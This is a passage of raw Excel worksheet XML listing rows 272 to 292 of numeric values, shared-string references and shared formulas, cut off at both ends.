      <c r="U272" s="5"/>
      <c r="V272" s="5"/>
      <c r="W272" s="47"/>
      <c r="X272" s="45"/>
      <c r="Y272" s="45"/>
      <c r="Z272" s="38" t="s">
        <v>1911</v>
      </c>
      <c r="AA272" s="39" t="s">
        <v>1912</v>
      </c>
      <c r="AB272" s="38" t="s">
        <v>1913</v>
      </c>
      <c r="AC272" s="40">
        <v>109775.0</v>
      </c>
      <c r="AD272" s="5"/>
      <c r="AE272" s="14"/>
      <c r="AF272" s="14"/>
    </row>
    <row r="273">
      <c r="A273" s="6">
        <f t="shared" si="1"/>
        <v>0.4984171695</v>
      </c>
      <c r="B273" s="29">
        <v>1.0</v>
      </c>
      <c r="C273" s="29">
        <v>54330.0</v>
      </c>
      <c r="D273" s="14"/>
      <c r="E273" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F273" s="14"/>
      <c r="G273" s="29">
        <v>4.0</v>
      </c>
      <c r="H273" s="29">
        <v>853.0</v>
      </c>
      <c r="I273" s="29">
        <v>42907.0</v>
      </c>
      <c r="J273" s="15"/>
      <c r="K273" s="29">
        <v>42907.0</v>
      </c>
      <c r="L273" s="15"/>
      <c r="M273" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N273" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O273" s="29">
        <v>5.0</v>
      </c>
      <c r="P273" s="29">
        <v>4.0</v>
      </c>
      <c r="Q273" s="15"/>
      <c r="R273" s="15"/>
      <c r="S273" s="15"/>
      <c r="T273" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U273" s="5"/>
      <c r="V273" s="5"/>
      <c r="W273" s="47"/>
      <c r="X273" s="45"/>
      <c r="Y273" s="45"/>
      <c r="Z273" s="38" t="s">
        <v>1914</v>
      </c>
      <c r="AA273" s="39" t="s">
        <v>1915</v>
      </c>
      <c r="AB273" s="38" t="s">
        <v>1916</v>
      </c>
      <c r="AC273" s="40">
        <v>54320.0</v>
      </c>
      <c r="AD273" s="5"/>
      <c r="AE273" s="14"/>
      <c r="AF273" s="14"/>
    </row>
    <row r="274">
      <c r="A274" s="6">
        <f t="shared" si="1"/>
        <v>0.2281993459</v>
      </c>
      <c r="B274" s="29">
        <v>1.0</v>
      </c>
      <c r="C274" s="15"/>
      <c r="D274" s="14"/>
      <c r="E274" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F274" s="14"/>
      <c r="G274" s="29">
        <v>3.0</v>
      </c>
      <c r="H274" s="29">
        <v>87.0</v>
      </c>
      <c r="I274" s="29">
        <v>138926.0</v>
      </c>
      <c r="J274" s="15"/>
      <c r="K274" s="29">
        <v>138926.0</v>
      </c>
      <c r="L274" s="15"/>
      <c r="M274" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N274" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O274" s="29">
        <v>0.0</v>
      </c>
      <c r="P274" s="29">
        <v>6.0</v>
      </c>
      <c r="Q274" s="15"/>
      <c r="R274" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S274" s="15"/>
      <c r="T274" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U274" s="5"/>
      <c r="V274" s="5"/>
      <c r="W274" s="47"/>
      <c r="X274" s="45"/>
      <c r="Y274" s="45"/>
      <c r="Z274" s="38" t="s">
        <v>1917</v>
      </c>
      <c r="AA274" s="39" t="s">
        <v>1918</v>
      </c>
      <c r="AB274" s="38" t="s">
        <v>1919</v>
      </c>
      <c r="AC274" s="40">
        <v>151976.0</v>
      </c>
      <c r="AD274" s="5"/>
      <c r="AE274" s="14"/>
      <c r="AF274" s="14"/>
    </row>
    <row r="275">
      <c r="A275" s="6">
        <f t="shared" si="1"/>
        <v>0.0123990108</v>
      </c>
      <c r="B275" s="29">
        <v>1.0</v>
      </c>
      <c r="C275" s="29">
        <v>145440.0</v>
      </c>
      <c r="D275" s="14"/>
      <c r="E275" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F275" s="14"/>
      <c r="G275" s="29">
        <v>-2.0</v>
      </c>
      <c r="H275" s="29">
        <v>642.0</v>
      </c>
      <c r="I275" s="29">
        <v>133548.0</v>
      </c>
      <c r="J275" s="15"/>
      <c r="K275" s="15"/>
      <c r="L275" s="15"/>
      <c r="M275" s="15"/>
      <c r="N275" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O275" s="29">
        <v>1.0</v>
      </c>
      <c r="P275" s="29">
        <v>3.0</v>
      </c>
      <c r="Q275" s="15"/>
      <c r="R275" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S275" s="15"/>
      <c r="T275" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U275" s="5"/>
      <c r="V275" s="5"/>
      <c r="W275" s="47"/>
      <c r="X275" s="45"/>
      <c r="Y275" s="45"/>
      <c r="Z275" s="38" t="s">
        <v>1920</v>
      </c>
      <c r="AA275" s="39" t="s">
        <v>1921</v>
      </c>
      <c r="AB275" s="38" t="s">
        <v>1922</v>
      </c>
      <c r="AC275" s="40">
        <v>145423.0</v>
      </c>
      <c r="AD275" s="5"/>
      <c r="AE275" s="14"/>
      <c r="AF275" s="14"/>
    </row>
    <row r="276">
      <c r="A276" s="6">
        <f t="shared" si="1"/>
        <v>0.8109408626</v>
      </c>
      <c r="B276" s="29">
        <v>1.0</v>
      </c>
      <c r="C276" s="14"/>
      <c r="D276" s="14"/>
      <c r="E276" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F276" s="14"/>
      <c r="G276" s="29">
        <v>9.0</v>
      </c>
      <c r="H276" s="29">
        <v>7724.0</v>
      </c>
      <c r="I276" s="29">
        <v>110133.0</v>
      </c>
      <c r="J276" s="15"/>
      <c r="K276" s="29">
        <v>110133.0</v>
      </c>
      <c r="L276" s="15"/>
      <c r="M276" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N276" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O276" s="29">
        <v>1.0</v>
      </c>
      <c r="P276" s="29">
        <v>10.0</v>
      </c>
      <c r="Q276" s="15"/>
      <c r="R276" s="15"/>
      <c r="S276" s="15"/>
      <c r="T276" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U276" s="5"/>
      <c r="V276" s="5"/>
      <c r="W276" s="47"/>
      <c r="X276" s="45"/>
      <c r="Y276" s="45"/>
      <c r="Z276" s="38" t="s">
        <v>1923</v>
      </c>
      <c r="AA276" s="39" t="s">
        <v>1924</v>
      </c>
      <c r="AB276" s="38" t="s">
        <v>1925</v>
      </c>
      <c r="AC276" s="40">
        <v>144240.0</v>
      </c>
      <c r="AD276" s="5"/>
      <c r="AE276" s="14"/>
      <c r="AF276" s="14"/>
    </row>
    <row r="277">
      <c r="A277" s="6">
        <f t="shared" si="1"/>
        <v>0.02436652696</v>
      </c>
      <c r="B277" s="29">
        <v>1.0</v>
      </c>
      <c r="C277" s="14"/>
      <c r="D277" s="14"/>
      <c r="E277" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F277" s="14"/>
      <c r="G277" s="29">
        <v>4.0</v>
      </c>
      <c r="H277" s="29">
        <v>584.0</v>
      </c>
      <c r="I277" s="29">
        <v>16619.0</v>
      </c>
      <c r="J277" s="15"/>
      <c r="K277" s="29">
        <v>65990.0</v>
      </c>
      <c r="L277" s="15"/>
      <c r="M277" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N277" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O277" s="29">
        <v>1.0</v>
      </c>
      <c r="P277" s="29">
        <v>0.0</v>
      </c>
      <c r="Q277" s="15"/>
      <c r="R277" s="15"/>
      <c r="S277" s="15"/>
      <c r="T277" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U277" s="5"/>
      <c r="V277" s="5"/>
      <c r="W277" s="47"/>
      <c r="X277" s="45"/>
      <c r="Y277" s="45"/>
      <c r="Z277" s="38" t="s">
        <v>1926</v>
      </c>
      <c r="AA277" s="39" t="s">
        <v>1927</v>
      </c>
      <c r="AB277" s="38" t="s">
        <v>1928</v>
      </c>
      <c r="AC277" s="40">
        <v>56211.0</v>
      </c>
      <c r="AD277" s="5"/>
      <c r="AE277" s="14"/>
      <c r="AF277" s="14"/>
    </row>
    <row r="278">
      <c r="A278" s="6">
        <f t="shared" si="1"/>
        <v>0.2571771776</v>
      </c>
      <c r="B278" s="29">
        <v>1.0</v>
      </c>
      <c r="C278" s="15"/>
      <c r="D278" s="14"/>
      <c r="E278" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F278" s="14"/>
      <c r="G278" s="29">
        <v>0.0</v>
      </c>
      <c r="H278" s="29">
        <v>213.0</v>
      </c>
      <c r="I278" s="29">
        <v>37372.0</v>
      </c>
      <c r="J278" s="15"/>
      <c r="K278" s="29">
        <v>6253.0</v>
      </c>
      <c r="L278" s="15"/>
      <c r="M278" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N278" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O278" s="29">
        <v>1.0</v>
      </c>
      <c r="P278" s="29">
        <v>2.0</v>
      </c>
      <c r="Q278" s="15"/>
      <c r="R278" s="15"/>
      <c r="S278" s="15"/>
      <c r="T278" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U278" s="5"/>
      <c r="V278" s="5"/>
      <c r="W278" s="47"/>
      <c r="X278" s="45"/>
      <c r="Y278" s="45"/>
      <c r="Z278" s="38" t="s">
        <v>1929</v>
      </c>
      <c r="AA278" s="39" t="s">
        <v>1930</v>
      </c>
      <c r="AB278" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC278" s="40">
        <v>204750.0</v>
      </c>
      <c r="AD278" s="5"/>
      <c r="AE278" s="14"/>
      <c r="AF278" s="14"/>
    </row>
    <row r="279">
      <c r="A279" s="6">
        <f t="shared" si="1"/>
        <v>0.02317078647</v>
      </c>
      <c r="B279" s="29">
        <v>1.0</v>
      </c>
      <c r="C279" s="29">
        <v>80031.0</v>
      </c>
      <c r="D279" s="14"/>
      <c r="E279" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F279" s="14"/>
      <c r="G279" s="29">
        <v>-1.0</v>
      </c>
      <c r="H279" s="29">
        <v>271.0</v>
      </c>
      <c r="I279" s="29">
        <v>67005.0</v>
      </c>
      <c r="J279" s="15"/>
      <c r="K279" s="15"/>
      <c r="L279" s="15"/>
      <c r="M279" s="15"/>
      <c r="N279" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O279" s="29">
        <v>1.0</v>
      </c>
      <c r="P279" s="29">
        <v>0.0</v>
      </c>
      <c r="Q279" s="15"/>
      <c r="R279" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S279" s="15"/>
      <c r="T279" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U279" s="5"/>
      <c r="V279" s="5"/>
      <c r="W279" s="45"/>
      <c r="X279" s="45"/>
      <c r="Y279" s="45"/>
      <c r="Z279" s="38" t="s">
        <v>1931</v>
      </c>
      <c r="AA279" s="39" t="s">
        <v>1932</v>
      </c>
      <c r="AB279" s="38" t="s">
        <v>1933</v>
      </c>
      <c r="AC279" s="40">
        <v>80029.0</v>
      </c>
      <c r="AD279" s="5"/>
      <c r="AE279" s="14"/>
      <c r="AF279" s="14"/>
    </row>
    <row r="280">
      <c r="A280" s="6">
        <f t="shared" si="1"/>
        <v>0.2382970544</v>
      </c>
      <c r="B280" s="29">
        <v>1.0</v>
      </c>
      <c r="C280" s="29">
        <v>106988.0</v>
      </c>
      <c r="D280" s="14"/>
      <c r="E280" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F280" s="14"/>
      <c r="G280" s="29">
        <v>1.0</v>
      </c>
      <c r="H280" s="29">
        <v>21958.0</v>
      </c>
      <c r="I280" s="29">
        <v>92643.0</v>
      </c>
      <c r="J280" s="15"/>
      <c r="K280" s="29">
        <v>92643.0</v>
      </c>
      <c r="L280" s="15"/>
      <c r="M280" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N280" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O280" s="29">
        <v>2.0</v>
      </c>
      <c r="P280" s="29">
        <v>3.0</v>
      </c>
      <c r="Q280" s="15"/>
      <c r="R280" s="15"/>
      <c r="S280" s="15"/>
      <c r="T280" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U280" s="5"/>
      <c r="V280" s="5"/>
      <c r="W280" s="47"/>
      <c r="X280" s="45"/>
      <c r="Y280" s="45"/>
      <c r="Z280" s="38" t="s">
        <v>1934</v>
      </c>
      <c r="AA280" s="39" t="s">
        <v>1935</v>
      </c>
      <c r="AB280" s="38" t="s">
        <v>1936</v>
      </c>
      <c r="AC280" s="40">
        <v>106983.0</v>
      </c>
      <c r="AD280" s="5"/>
      <c r="AE280" s="14"/>
      <c r="AF280" s="14"/>
    </row>
    <row r="281">
      <c r="A281" s="6">
        <f t="shared" si="1"/>
        <v>0.3174524132</v>
      </c>
      <c r="B281" s="29">
        <v>1.0</v>
      </c>
      <c r="C281" s="29">
        <v>46553.0</v>
      </c>
      <c r="D281" s="14"/>
      <c r="E281" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F281" s="14"/>
      <c r="G281" s="29">
        <v>1.0</v>
      </c>
      <c r="H281" s="29">
        <v>72870.0</v>
      </c>
      <c r="I281" s="29">
        <v>35135.0</v>
      </c>
      <c r="J281" s="15"/>
      <c r="K281" s="15"/>
      <c r="L281" s="15"/>
      <c r="M281" s="15"/>
      <c r="N281" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O281" s="29">
        <v>3.0</v>
      </c>
      <c r="P281" s="29">
        <v>1.0</v>
      </c>
      <c r="Q281" s="15"/>
      <c r="R281" s="15"/>
      <c r="S281" s="15"/>
      <c r="T281" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U281" s="5"/>
      <c r="V281" s="5"/>
      <c r="W281" s="47"/>
      <c r="X281" s="45"/>
      <c r="Y281" s="45"/>
      <c r="Z281" s="38" t="s">
        <v>1937</v>
      </c>
      <c r="AA281" s="39" t="s">
        <v>1938</v>
      </c>
      <c r="AB281" s="38" t="s">
        <v>1939</v>
      </c>
      <c r="AC281" s="40">
        <v>46550.0</v>
      </c>
      <c r="AD281" s="5"/>
      <c r="AE281" s="14"/>
      <c r="AF281" s="14"/>
    </row>
    <row r="282">
      <c r="A282" s="6">
        <f t="shared" si="1"/>
        <v>0.7296353938</v>
      </c>
      <c r="B282" s="29">
        <v>1.0</v>
      </c>
      <c r="C282" s="29">
        <v>137816.0</v>
      </c>
      <c r="D282" s="14"/>
      <c r="E282" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F282" s="14"/>
      <c r="G282" s="29">
        <v>1.0</v>
      </c>
      <c r="H282" s="29">
        <v>587.0</v>
      </c>
      <c r="I282" s="29">
        <v>89133.0</v>
      </c>
      <c r="J282" s="15"/>
      <c r="K282" s="15"/>
      <c r="L282" s="15"/>
      <c r="M282" s="15"/>
      <c r="N282" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O282" s="29">
        <v>1.0</v>
      </c>
      <c r="P282" s="29">
        <v>1.0</v>
      </c>
      <c r="Q282" s="15"/>
      <c r="R282" s="15"/>
      <c r="S282" s="15"/>
      <c r="T282" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U282" s="5"/>
      <c r="V282" s="5"/>
      <c r="W282" s="47"/>
      <c r="X282" s="45"/>
      <c r="Y282" s="45"/>
      <c r="Z282" s="38" t="s">
        <v>1940</v>
      </c>
      <c r="AA282" s="39" t="s">
        <v>1941</v>
      </c>
      <c r="AB282" s="38" t="s">
        <v>1942</v>
      </c>
      <c r="AC282" s="40">
        <v>137812.0</v>
      </c>
      <c r="AD282" s="5"/>
      <c r="AE282" s="14"/>
      <c r="AF282" s="14"/>
    </row>
    <row r="283">
      <c r="A283" s="6">
        <f t="shared" si="1"/>
        <v>0.4758274621</v>
      </c>
      <c r="B283" s="29">
        <v>1.0</v>
      </c>
      <c r="C283" s="15"/>
      <c r="D283" s="14"/>
      <c r="E283" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F283" s="14"/>
      <c r="G283" s="29">
        <v>7.0</v>
      </c>
      <c r="H283" s="29">
        <v>3653.0</v>
      </c>
      <c r="I283" s="29">
        <v>50516.0</v>
      </c>
      <c r="J283" s="15"/>
      <c r="K283" s="29">
        <v>414.0</v>
      </c>
      <c r="L283" s="15"/>
      <c r="M283" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N283" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O283" s="29">
        <v>2.0</v>
      </c>
      <c r="P283" s="29">
        <v>1.0</v>
      </c>
      <c r="Q283" s="15"/>
      <c r="R283" s="15"/>
      <c r="S283" s="15"/>
      <c r="T283" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U283" s="5"/>
      <c r="V283" s="5"/>
      <c r="W283" s="47"/>
      <c r="X283" s="45"/>
      <c r="Y283" s="45"/>
      <c r="Z283" s="38" t="s">
        <v>1943</v>
      </c>
      <c r="AA283" s="39" t="s">
        <v>1944</v>
      </c>
      <c r="AB283" s="38" t="s">
        <v>1629</v>
      </c>
      <c r="AC283" s="40">
        <v>62711.0</v>
      </c>
      <c r="AD283" s="5"/>
      <c r="AE283" s="14"/>
      <c r="AF283" s="14"/>
    </row>
    <row r="284">
      <c r="A284" s="6">
        <f t="shared" si="1"/>
        <v>0.5494294092</v>
      </c>
      <c r="B284" s="29">
        <v>1.0</v>
      </c>
      <c r="C284" s="29">
        <v>150010.0</v>
      </c>
      <c r="D284" s="14"/>
      <c r="E284" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F284" s="14"/>
      <c r="G284" s="29">
        <v>4.0</v>
      </c>
      <c r="H284" s="29">
        <v>17763.0</v>
      </c>
      <c r="I284" s="29">
        <v>69164.0</v>
      </c>
      <c r="J284" s="15"/>
      <c r="K284" s="29">
        <v>8340.0</v>
      </c>
      <c r="L284" s="15"/>
      <c r="M284" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N284" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O284" s="29">
        <v>1.0</v>
      </c>
      <c r="P284" s="29">
        <v>2.0</v>
      </c>
      <c r="Q284" s="15"/>
      <c r="R284" s="15"/>
      <c r="S284" s="15"/>
      <c r="T284" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U284" s="5"/>
      <c r="V284" s="5"/>
      <c r="W284" s="47"/>
      <c r="X284" s="45"/>
      <c r="Y284" s="45"/>
      <c r="Z284" s="38" t="s">
        <v>1945</v>
      </c>
      <c r="AA284" s="39" t="s">
        <v>1946</v>
      </c>
      <c r="AB284" s="38" t="s">
        <v>1947</v>
      </c>
      <c r="AC284" s="40">
        <v>150009.0</v>
      </c>
      <c r="AD284" s="5"/>
      <c r="AE284" s="14"/>
      <c r="AF284" s="14"/>
    </row>
    <row r="285">
      <c r="A285" s="6">
        <f t="shared" si="1"/>
        <v>0.1979043036</v>
      </c>
      <c r="B285" s="29">
        <v>1.0</v>
      </c>
      <c r="C285" s="14"/>
      <c r="D285" s="14"/>
      <c r="E285" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F285" s="14"/>
      <c r="G285" s="29">
        <v>1.0</v>
      </c>
      <c r="H285" s="29">
        <v>39.0</v>
      </c>
      <c r="I285" s="29">
        <v>16116.0</v>
      </c>
      <c r="J285" s="15"/>
      <c r="K285" s="29">
        <v>6253.0</v>
      </c>
      <c r="L285" s="15"/>
      <c r="M285" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N285" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O285" s="29">
        <v>0.0</v>
      </c>
      <c r="P285" s="29">
        <v>3.0</v>
      </c>
      <c r="Q285" s="15"/>
      <c r="R285" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S285" s="15"/>
      <c r="T285" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U285" s="5"/>
      <c r="V285" s="5"/>
      <c r="W285" s="47"/>
      <c r="X285" s="45"/>
      <c r="Y285" s="45"/>
      <c r="Z285" s="38" t="s">
        <v>1948</v>
      </c>
      <c r="AA285" s="39" t="s">
        <v>1949</v>
      </c>
      <c r="AB285" s="38" t="s">
        <v>1950</v>
      </c>
      <c r="AC285" s="40">
        <v>223919.0</v>
      </c>
      <c r="AD285" s="5"/>
      <c r="AE285" s="14"/>
      <c r="AF285" s="14"/>
    </row>
    <row r="286">
      <c r="A286" s="6">
        <f t="shared" si="1"/>
        <v>0.6554256665</v>
      </c>
      <c r="B286" s="29">
        <v>1.0</v>
      </c>
      <c r="C286" s="15"/>
      <c r="D286" s="14"/>
      <c r="E286" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F286" s="14"/>
      <c r="G286" s="29">
        <v>0.0</v>
      </c>
      <c r="H286" s="29">
        <v>116.0</v>
      </c>
      <c r="I286" s="29">
        <v>20296.0</v>
      </c>
      <c r="J286" s="15"/>
      <c r="K286" s="29">
        <v>-1.0</v>
      </c>
      <c r="L286" s="15"/>
      <c r="M286" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N286" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O286" s="29">
        <v>1.0</v>
      </c>
      <c r="P286" s="29">
        <v>2.0</v>
      </c>
      <c r="Q286" s="15"/>
      <c r="R286" s="15"/>
      <c r="S286" s="15"/>
      <c r="T286" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U286" s="5"/>
      <c r="V286" s="5"/>
      <c r="W286" s="47"/>
      <c r="X286" s="45"/>
      <c r="Y286" s="45"/>
      <c r="Z286" s="38" t="s">
        <v>1951</v>
      </c>
      <c r="AA286" s="39" t="s">
        <v>1952</v>
      </c>
      <c r="AB286" s="38" t="s">
        <v>1953</v>
      </c>
      <c r="AC286" s="40">
        <v>136776.0</v>
      </c>
      <c r="AD286" s="5"/>
      <c r="AE286" s="14"/>
      <c r="AF286" s="14"/>
    </row>
    <row r="287">
      <c r="A287" s="6">
        <f t="shared" si="1"/>
        <v>0.6682932204</v>
      </c>
      <c r="B287" s="29">
        <v>1.0</v>
      </c>
      <c r="C287" s="15"/>
      <c r="D287" s="14"/>
      <c r="E287" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F287" s="14"/>
      <c r="G287" s="29">
        <v>1.0</v>
      </c>
      <c r="H287" s="29">
        <v>156.0</v>
      </c>
      <c r="I287" s="29">
        <v>47385.0</v>
      </c>
      <c r="J287" s="15"/>
      <c r="K287" s="29">
        <v>6253.0</v>
      </c>
      <c r="L287" s="15"/>
      <c r="M287" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N287" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O287" s="29">
        <v>2.0</v>
      </c>
      <c r="P287" s="29">
        <v>1.0</v>
      </c>
      <c r="Q287" s="15"/>
      <c r="R287" s="15"/>
      <c r="S287" s="15"/>
      <c r="T287" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U287" s="5"/>
      <c r="V287" s="5"/>
      <c r="W287" s="47"/>
      <c r="X287" s="45"/>
      <c r="Y287" s="45"/>
      <c r="Z287" s="38" t="s">
        <v>1954</v>
      </c>
      <c r="AA287" s="39" t="s">
        <v>1955</v>
      </c>
      <c r="AB287" s="38" t="s">
        <v>1391</v>
      </c>
      <c r="AC287" s="40">
        <v>121540.0</v>
      </c>
      <c r="AD287" s="5"/>
      <c r="AE287" s="14"/>
      <c r="AF287" s="14"/>
    </row>
    <row r="288">
      <c r="A288" s="6">
        <f t="shared" si="1"/>
        <v>0.7119571574</v>
      </c>
      <c r="B288" s="29">
        <v>1.0</v>
      </c>
      <c r="C288" s="29">
        <v>181549.0</v>
      </c>
      <c r="D288" s="14"/>
      <c r="E288" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F288" s="14"/>
      <c r="G288" s="29">
        <v>4.0</v>
      </c>
      <c r="H288" s="29">
        <v>3008.0</v>
      </c>
      <c r="I288" s="29">
        <v>139193.0</v>
      </c>
      <c r="J288" s="15"/>
      <c r="K288" s="29">
        <v>76718.0</v>
      </c>
      <c r="L288" s="15"/>
      <c r="M288" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N288" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O288" s="29">
        <v>1.0</v>
      </c>
      <c r="P288" s="29">
        <v>1.0</v>
      </c>
      <c r="Q288" s="15"/>
      <c r="R288" s="15"/>
      <c r="S288" s="15"/>
      <c r="T288" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U288" s="5"/>
      <c r="V288" s="5"/>
      <c r="W288" s="47"/>
      <c r="X288" s="45"/>
      <c r="Y288" s="45"/>
      <c r="Z288" s="38" t="s">
        <v>1956</v>
      </c>
      <c r="AA288" s="39" t="s">
        <v>1957</v>
      </c>
      <c r="AB288" s="38" t="s">
        <v>1958</v>
      </c>
      <c r="AC288" s="40">
        <v>151164.0</v>
      </c>
      <c r="AD288" s="5"/>
      <c r="AE288" s="14"/>
      <c r="AF288" s="14"/>
    </row>
    <row r="289">
      <c r="A289" s="6">
        <f t="shared" si="1"/>
        <v>0.5576532683</v>
      </c>
      <c r="B289" s="29">
        <v>1.0</v>
      </c>
      <c r="C289" s="29">
        <v>215491.0</v>
      </c>
      <c r="D289" s="14"/>
      <c r="E289" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F289" s="14"/>
      <c r="G289" s="29">
        <v>0.0</v>
      </c>
      <c r="H289" s="29">
        <v>768.0</v>
      </c>
      <c r="I289" s="29">
        <v>214790.0</v>
      </c>
      <c r="J289" s="15"/>
      <c r="K289" s="29">
        <v>35683.0</v>
      </c>
      <c r="L289" s="15"/>
      <c r="M289" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N289" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O289" s="29">
        <v>2.0</v>
      </c>
      <c r="P289" s="29">
        <v>3.0</v>
      </c>
      <c r="Q289" s="15"/>
      <c r="R289" s="15"/>
      <c r="S289" s="15"/>
      <c r="T289" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U289" s="5"/>
      <c r="V289" s="5"/>
      <c r="W289" s="47"/>
      <c r="X289" s="45"/>
      <c r="Y289" s="45"/>
      <c r="Z289" s="38" t="s">
        <v>1959</v>
      </c>
      <c r="AA289" s="39" t="s">
        <v>1960</v>
      </c>
      <c r="AB289" s="38" t="s">
        <v>1961</v>
      </c>
      <c r="AC289" s="40">
        <v>215460.0</v>
      </c>
      <c r="AD289" s="5"/>
      <c r="AE289" s="14"/>
      <c r="AF289" s="14"/>
    </row>
    <row r="290">
      <c r="A290" s="6">
        <f t="shared" si="1"/>
        <v>0.6038580241</v>
      </c>
      <c r="B290" s="29">
        <v>1.0</v>
      </c>
      <c r="C290" s="15"/>
      <c r="D290" s="14"/>
      <c r="E290" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F290" s="14"/>
      <c r="G290" s="29">
        <v>0.0</v>
      </c>
      <c r="H290" s="29">
        <v>75.0</v>
      </c>
      <c r="I290" s="29">
        <v>272861.0</v>
      </c>
      <c r="J290" s="15"/>
      <c r="K290" s="15"/>
      <c r="L290" s="15"/>
      <c r="M290" s="15"/>
      <c r="N290" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O290" s="29">
        <v>1.0</v>
      </c>
      <c r="P290" s="29">
        <v>0.0</v>
      </c>
      <c r="Q290" s="15"/>
      <c r="R290" s="15"/>
      <c r="S290" s="15"/>
      <c r="T290" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U290" s="5"/>
      <c r="V290" s="5"/>
      <c r="W290" s="47"/>
      <c r="X290" s="45"/>
      <c r="Y290" s="45"/>
      <c r="Z290" s="38" t="s">
        <v>1962</v>
      </c>
      <c r="AA290" s="39" t="s">
        <v>1963</v>
      </c>
      <c r="AB290" s="38" t="s">
        <v>1964</v>
      </c>
      <c r="AC290" s="40">
        <v>258828.0</v>
      </c>
      <c r="AD290" s="5"/>
      <c r="AE290" s="14"/>
      <c r="AF290" s="14"/>
    </row>
    <row r="291">
      <c r="A291" s="6">
        <f t="shared" si="1"/>
        <v>0.6889491067</v>
      </c>
      <c r="B291" s="29">
        <v>1.0</v>
      </c>
      <c r="C291" s="15"/>
      <c r="D291" s="14"/>
      <c r="E291" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F291" s="14"/>
      <c r="G291" s="29">
        <v>13.0</v>
      </c>
      <c r="H291" s="29">
        <v>340.0</v>
      </c>
      <c r="I291" s="29">
        <v>396.0</v>
      </c>
      <c r="J291" s="15"/>
      <c r="K291" s="29">
        <v>-1.0</v>
      </c>
      <c r="L291" s="15"/>
      <c r="M291" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N291" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O291" s="29">
        <v>1.0</v>
      </c>
      <c r="P291" s="29">
        <v>7.0</v>
      </c>
      <c r="Q291" s="15"/>
      <c r="R291" s="15"/>
      <c r="S291" s="15"/>
      <c r="T291" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U291" s="5"/>
      <c r="V291" s="5"/>
      <c r="W291" s="47"/>
      <c r="X291" s="45"/>
      <c r="Y291" s="45"/>
      <c r="Z291" s="38" t="s">
        <v>1965</v>
      </c>
      <c r="AA291" s="39" t="s">
        <v>1966</v>
      </c>
      <c r="AB291" s="38" t="s">
        <v>1967</v>
      </c>
      <c r="AC291" s="40">
        <v>98244.0</v>
      </c>
      <c r="AD291" s="5"/>
      <c r="AE291" s="14"/>
      <c r="AF291" s="14"/>
    </row>
    <row r="292">
      <c r="A292" s="6">
        <f t="shared" si="1"/>
        <v>0.8294760497</v>
      </c>
      <c r="B292" s="29">
        <v>1.0</v>
      </c>
      <c r="C292" s="15"/>
      <c r="D292" s="14"/>
      <c r="E292" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F292" s="14"/>
      <c r="G292" s="29">
